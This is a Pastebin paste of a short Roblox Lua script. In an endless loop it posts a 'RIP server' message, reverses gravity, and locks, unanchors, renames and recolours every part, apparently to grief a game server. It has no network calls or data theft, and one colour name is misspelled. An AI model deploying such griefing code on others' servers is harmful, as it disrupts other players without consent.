Advertisement
dahpiglz

Untitled

Aug 4th, 2016
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. while true do
  2. wait(5)
  3. m = Instance.new("Message")
  4. m.Text = ("RIP server")
  5. m.Parent = game.Workspace
  6. game.Workspace.Gravity = -10
  7.  
  8. for i,v in pairs(game.Workspace:GetChildren()) do
  9. if v:IsA("Part")then
  10. v.BrickColor = BrickColor.new('Bright voilet')
  11. v.Name = ("locked")
  12. v.Locked = true
  13. v.Anchored = false
  14. end
  15. end
  16. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement